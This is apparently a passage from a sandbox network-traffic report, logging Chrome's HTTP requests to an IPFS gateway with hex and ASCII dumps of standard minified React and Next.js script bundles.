                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1366INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 130002
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidula2dcyjivfqf3m2suqkg364bz7jat6qdpuzfmj36fpe5ckypiq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/framework-79bce4a3a540b080.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreidula2dcyjivfqf3m2suqkg364bz7jat6qdpuzfmj36fpe5ckypiq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028477
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 63 62 61 35 33 63 33 34 65 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41cba53c34e-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1298INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 37 37 34 5d 2c 7b 36 34 34 34 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 36 37 32 39 34 29 2c 6c 3d 6e 28 39 36 30 38 36 29 2c 61 3d 6e 28 36 33 38 34 30 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 6a 73 2e 6f 72 67 2f 64 6f 63 73 2f 65 72 72 6f 72 2d 64 65 63 6f 64 65 72 2e 68 74 6d 6c 3f 69 6e 76 61 72 69 61 6e 74 3d 22 2b 65 2c 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 74 2b 3d 22 26 61 72 67 73
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{64448:function(e,t,n){var r=n(67294),l=n(96086),a=n(63840);function o(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 7a 65 55 52 4c 3d 61 2c 74 68 69 73 2e 72 65 6d 6f 76 65 45 6d 70 74 79 53 74 72 69 6e 67 3d 6f 7d 76 61 72 20 67 3d 7b 7d 3b 22 63 68 69 6c 64 72 65 6e 20 64 61 6e 67 65 72 6f 75 73 6c 79 53 65 74 49 6e 6e 65 72 48 54 4d 4c 20 64 65 66 61 75 6c 74 56 61 6c 75 65 20 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 20 69 6e 6e 65 72 48 54 4d 4c 20 73 75 70 70 72 65 73 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 57 61 72 6e 69 6e 67 20 73 75 70 70 72 65 73 73 48 79 64 72 61 74 69 6f 6e 57 61 72 6e 69 6e 67 20 73 74 79 6c 65 22 2e 73 70 6c 69 74 28 22 20 22 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 67 5b 65 5d 3d 6e 65 77 20 76 28 65 2c 30 2c 21 31 2c 65 2c 6e 75 6c 6c 2c 21 31 2c 21 31 29 7d 29 29 2c 5b 5b 22 61 63 63 65 70 74 43 68
                                                                                                                                                                                                                                                  Data Ascii: zeURL=a,this.removeEmptyString=o}var g={};"children dangerouslySetInnerHTML defaultValue defaultChecked innerHTML suppressContentEditableWarning suppressHydrationWarning style".split(" ").forEach((function(e){g[e]=new v(e,0,!1,e,null,!1,!1)})),[["acceptCh
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6f 6e 20 62 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 31 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 66 75 6e 63 74 69 6f 6e 20 77 28 65 2c 74 2c 6e 2c 72 29 7b 76 61 72 20 6c 3d 67 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 74 29 3f 67 5b 74 5d 3a 6e 75 6c 6c 3b 28 6e 75 6c 6c 21 3d 3d 6c 3f 30 3d 3d 3d 6c 2e 74 79 70 65 3a 21 72 26 26 28 32 3c 74 2e 6c 65 6e 67 74 68 26 26 28 22 6f 22 3d 3d 3d 74 5b 30 5d 7c 7c 22 4f 22 3d 3d 3d 74 5b 30 5d 29 26 26 28 22 6e 22 3d 3d 3d 74 5b 31 5d 7c 7c 22 4e 22 3d 3d 3d 74 5b 31 5d 29 29 29 7c 7c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 74 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 74 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29
                                                                                                                                                                                                                                                  Data Ascii: on b(e){return e[1].toUpperCase()}function w(e,t,n,r){var l=g.hasOwnProperty(t)?g[t]:null;(null!==l?0===l.type:!r&&(2<t.length&&("o"===t[0]||"O"===t[0])&&("n"===t[1]||"N"===t[1])))||(function(e,t,n,r){if(null===t||"undefined"===typeof t||function(e,t,n,r)
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 2d 6e 61 6d 65 20 67 6c 79 70 68 2d 6f 72 69 65 6e 74 61 74 69 6f 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 20 67 6c 79 70 68 2d 6f 72 69 65 6e 74 61 74 69 6f 6e 2d 76 65 72 74 69 63 61 6c 20 68 6f 72 69 7a 2d 61 64 76 2d 78 20 68 6f 72 69 7a 2d 6f 72 69 67 69 6e 2d 78 20 69 6d 61 67 65 2d 72 65 6e 64 65 72 69 6e 67 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 20 6c 69 67 68 74 69 6e 67 2d 63 6f 6c 6f 72 20 6d 61 72 6b 65 72 2d 65 6e 64 20 6d 61 72 6b 65 72 2d 6d 69 64 20 6d 61 72 6b 65 72 2d 73 74 61 72 74 20 6f 76 65 72 6c 69 6e 65 2d 70 6f 73 69 74 69 6f 6e 20 6f 76 65 72 6c 69 6e 65 2d 74 68 69 63 6b 6e 65 73 73 20 70 61 69 6e 74 2d 6f 72 64 65 72 20 70 61 6e 6f 73 65 2d 31 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 20 72 65 6e 64 65 72 69 6e 67 2d 69 6e
                                                                                                                                                                                                                                                  Data Ascii: -name glyph-orientation-horizontal glyph-orientation-vertical horiz-adv-x horiz-origin-x image-rendering letter-spacing lighting-color marker-end marker-mid marker-start overline-position overline-thickness paint-order panose-1 pointer-events rendering-in
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 41 63 74 69 6f 6e 22 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 67 5b 65 5d 3d 6e 65 77 20 76 28 65 2c 31 2c 21 31 2c 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 75 6c 6c 2c 21 30 2c 21 30 29 7d 29 29 3b 76 61 72 20 6b 3d 72 2e 5f 5f 53 45 43 52 45 54 5f 49 4e 54 45 52 4e 41 4c 53 5f 44 4f 5f 4e 4f 54 5f 55 53 45 5f 4f 52 5f 59 4f 55 5f 57 49 4c 4c 5f 42 45 5f 46 49 52 45 44 2c 53 3d 36 30 31 30 33 2c 45 3d 36 30 31 30 36 2c 5f 3d 36 30 31 30 37 2c 78 3d 36 30 31 30 38 2c 43 3d 36 30 31 31 34 2c 50 3d 36 30 31 30 39 2c 4e 3d 36 30 31 31 30 2c 54 3d 36 30 31 31 32 2c 4c 3d 36 30 31 31 33 2c 7a 3d 36 30 31 32 30 2c 4f 3d 36 30 31 31 35 2c 52 3d 36 30 31 31 36 2c 4d 3d 36 30 31 32 31 2c 46 3d 36 30 31 32 38 2c 49 3d 36 30 31
                                                                                                                                                                                                                                                  Data Ascii: Action"].forEach((function(e){g[e]=new v(e,1,!1,e.toLowerCase(),null,!0,!0)}));var k=r.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED,S=60103,E=60106,_=60107,x=60108,C=60114,P=60109,N=60110,T=60112,L=60113,z=60120,O=60115,R=60116,M=60121,F=60128,I=601
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 73 65 7b 74 72 79 7b 74 2e 63 61 6c 6c 28 29 7d 63 61 74 63 68 28 69 29 7b 72 3d 69 7d 65 2e 63 61 6c 6c 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 7d 65 6c 73 65 7b 74 72 79 7b 74 68 72 6f 77 20 45 72 72 6f 72 28 29 7d 63 61 74 63 68 28 69 29 7b 72 3d 69 7d 65 28 29 7d 7d 63 61 74 63 68 28 69 29 7b 69 66 28 69 26 26 72 26 26 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 69 2e 73 74 61 63 6b 29 7b 66 6f 72 28 76 61 72 20 6c 3d 69 2e 73 74 61 63 6b 2e 73 70 6c 69 74 28 22 5c 6e 22 29 2c 61 3d 72 2e 73 74 61 63 6b 2e 73 70 6c 69 74 28 22 5c 6e 22 29 2c 6f 3d 6c 2e 6c 65 6e 67 74 68 2d 31 2c 75 3d 61 2e 6c 65 6e 67 74 68 2d 31 3b 31 3c 3d 6f 26 26 30 3c 3d 75 26 26 6c 5b 6f 5d 21 3d 3d 61 5b 75 5d 3b 29 75 2d 2d 3b 66 6f 72 28 3b 31 3c 3d 6f 26 26 30 3c
                                                                                                                                                                                                                                                  Data Ascii: se{try{t.call()}catch(i){r=i}e.call(t.prototype)}else{try{throw Error()}catch(i){r=i}e()}}catch(i){if(i&&r&&"string"===typeof i.stack){for(var l=i.stack.split("\n"),a=r.stack.split("\n"),o=l.length-1,u=a.length-1;1<=o&&0<=u&&l[o]!==a[u];)u--;for(;1<=o&&0<
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 20 4d 3a 72 65 74 75 72 6e 20 71 28 65 2e 5f 72 65 6e 64 65 72 29 3b 63 61 73 65 20 52 3a 74 3d 65 2e 5f 70 61 79 6c 6f 61 64 2c 65 3d 65 2e 5f 69 6e 69 74 3b 74 72 79 7b 72 65 74 75 72 6e 20 71 28 65 28 74 29 29 7d 63 61 74 63 68 28 6e 29 7b 7d 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 65 29 7b 63 61 73 65 22 62 6f 6f 6c 65 61 6e 22 3a 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 63 61 73 65 22 6f 62 6a 65 63 74 22 3a 63 61 73 65 22 73 74 72 69 6e 67 22 3a 63 61 73 65 22 75 6e 64 65 66 69 6e 65 64 22 3a 72 65 74 75 72 6e 20 65 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 22 7d 7d 66 75 6e 63 74 69 6f 6e 20 59 28 65 29 7b 76 61 72 20 74 3d 65 2e 74 79 70 65 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                  Data Ascii: M:return q(e._render);case R:t=e._payload,e=e._init;try{return q(e(t))}catch(n){}}return null}function K(e){switch(typeof e){case"boolean":case"number":case"object":case"string":case"undefined":return e;default:return""}}function Y(e){var t=e.type;return
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6e 3a 65 2e 5f 77 72 61 70 70 65 72 53 74 61 74 65 2e 69 6e 69 74 69 61 6c 43 68 65 63 6b 65 64 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 65 2c 74 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 3d 3d 74 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 3f 22 22 3a 74 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 2c 72 3d 6e 75 6c 6c 21 3d 74 2e 63 68 65 63 6b 65 64 3f 74 2e 63 68 65 63 6b 65 64 3a 74 2e 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 3b 6e 3d 4b 28 6e 75 6c 6c 21 3d 74 2e 76 61 6c 75 65 3f 74 2e 76 61 6c 75 65 3a 6e 29 2c 65 2e 5f 77 72 61 70 70 65 72 53 74 61 74 65 3d 7b 69 6e 69 74 69 61 6c 43 68 65 63 6b 65 64 3a 72 2c 69 6e 69 74 69 61 6c 56 61 6c 75 65 3a 6e 2c 63 6f 6e 74 72 6f 6c 6c 65 64 3a 22 63 68 65 63 6b 62 6f 78 22 3d 3d 3d 74 2e 74 79 70 65 7c 7c 22 72 61
                                                                                                                                                                                                                                                  Data Ascii: n:e._wrapperState.initialChecked})}function ee(e,t){var n=null==t.defaultValue?"":t.defaultValue,r=null!=t.checked?t.checked:t.defaultChecked;n=K(null!=t.value?t.value:n),e._wrapperState={initialChecked:r,initialValue:n,controlled:"checkbox"===t.type||"ra
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6f 72 45 61 63 68 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 75 6c 6c 21 3d 65 26 26 28 74 2b 3d 65 29 7d 29 29 2c 74 7d 28 74 2e 63 68 69 6c 64 72 65 6e 29 29 26 26 28 65 2e 63 68 69 6c 64 72 65 6e 3d 74 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 6f 65 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 65 3d 65 2e 6f 70 74 69 6f 6e 73 2c 74 29 7b 74 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 6c 3d 30 3b 6c 3c 6e 2e 6c 65 6e 67 74 68 3b 6c 2b 2b 29 74 5b 22 24 22 2b 6e 5b 6c 5d 5d 3d 21 30 3b 66 6f 72 28 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 6c 3d 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 24 22 2b 65 5b 6e 5d 2e 76 61 6c 75 65 29 2c 65 5b 6e 5d 2e 73 65 6c 65 63 74 65 64 21 3d 3d 6c 26 26 28 65 5b 6e 5d 2e 73 65 6c 65 63 74 65 64 3d 6c 29
                                                                                                                                                                                                                                                  Data Ascii: orEach(e,(function(e){null!=e&&(t+=e)})),t}(t.children))&&(e.children=t),e}function oe(e,t,n,r){if(e=e.options,t){t={};for(var l=0;l<n.length;l++)t["$"+n[l]]=!0;for(n=0;n<e.length;n++)l=t.hasOwnProperty("$"+e[n].value),e[n].selected!==l&&(e[n].selected=l)


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  50192.168.2.549767209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC739OUTGET /_next/static/chunks/main-37e08f82b0681cde.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 85086
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiaahaxlzpgo4xw6oh4nnvse2jvupr3m5jcuwmu5ki5gd5ylswcqze"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/main-37e08f82b0681cde.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiaahaxlzpgo4xw6oh4nnvse2jvupr3m5jcuwmu5ki5gd5ylswcqze
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-07
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 7455183
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 65 36 61 31 35 34 33 32 32 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41e6a154322-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 37 39 5d 2c 7b 36 33 31 33 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6e 75 6c 6c 3b 72 65 74 75 72 6e 7b 6d 6f 75 6e 74 65 64 49 6e 73 74 61 6e 63 65 73 3a 6e 65 77 20 53 65 74 2c 75 70 64 61 74 65 48 65 61 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 3d 65 3d 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{63133:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(){var e=null;return{mountedInstances:new Set,updateHead:function(t){var r=e=Promise.resolve
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 61 29 7d 29 29 2c 61 2e 63 6f 6e 74 65 6e 74 3d 28 69 2d 75 2e 6c 65 6e 67 74 68 2b 66 2e 6c 65 6e 67 74 68 29 2e 74 6f 53 74 72 69 6e 67 28 29 7d 28 65 2c 61 5b 65 5d 7c 7c 5b 5d 29 7d 29 29 7d 7d 29 29 7d 7d 7d 2c 74 2e 69 73 45 71 75 61 6c 4e 6f 64 65 3d 6f 2c 74 2e 44 4f 4d 41 74 74 72 69 62 75 74 65 4e 61 6d 65 73 3d 76 6f 69 64 20 30 3b 76 61 72 20 72 3d 7b 61 63 63 65 70 74 43 68 61 72 73 65 74 3a 22 61 63 63 65 70 74 2d 63 68 61 72 73 65 74 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 63 6c 61 73 73 22 2c 68 74 6d 6c 46 6f 72 3a 22 66 6f 72 22 2c 68 74 74 70 45 71 75 69 76 3a 22 68 74 74 70 2d 65 71 75 69 76 22 2c 6e 6f 4d 6f 64 75 6c 65 3a 22 6e 6f 4d 6f
                                                                                                                                                                                                                                                  Data Ascii: ction(e){return r.insertBefore(e,a)})),a.content=(i-u.length+f.length).toString()}(e,a[e]||[])}))}}))}}},t.isEqualNode=o,t.DOMAttributeNames=void 0;var r={acceptCharset:"accept-charset",className:"class",htmlFor:"for",httpEquiv:"http-equiv",noModule:"noMo
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 2c 6e 3d 73 28 65 29 3b 69 66 28 74 29 7b 76 61 72 20 6f 3d 73 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 72 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6e 2c 61 72 67 75 6d 65 6e 74 73 2c 6f 29 7d 65 6c 73 65 20 72 3d 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 63 28 74 68 69 73 2c 72 29 7d 7d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 59 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 74 2e
                                                                                                                                                                                                                                                  Data Ascii: ;return function(){var r,n=s(e);if(t){var o=s(this).constructor;r=Reflect.construct(n,arguments,o)}else r=n.apply(this,arguments);return c(this,r)}}Object.defineProperty(t,"__esModule",{value:!0}),t.initialize=function(){return Y.apply(this,arguments)},t.
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 74 3a 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 2c 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 26 26 28 6e 3d 6e 2e 63 6f 6e 63 61 74 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 72 29 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79
                                                                                                                                                                                                                                                  Data Ascii: t:e}}function T(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{},n=Object.keys(r);"function"===typeof Object.getOwnPropertySymbols&&(n=n.concat(Object.getOwnPropertySymbols(r).filter((function(e){return Object.getOwnProperty
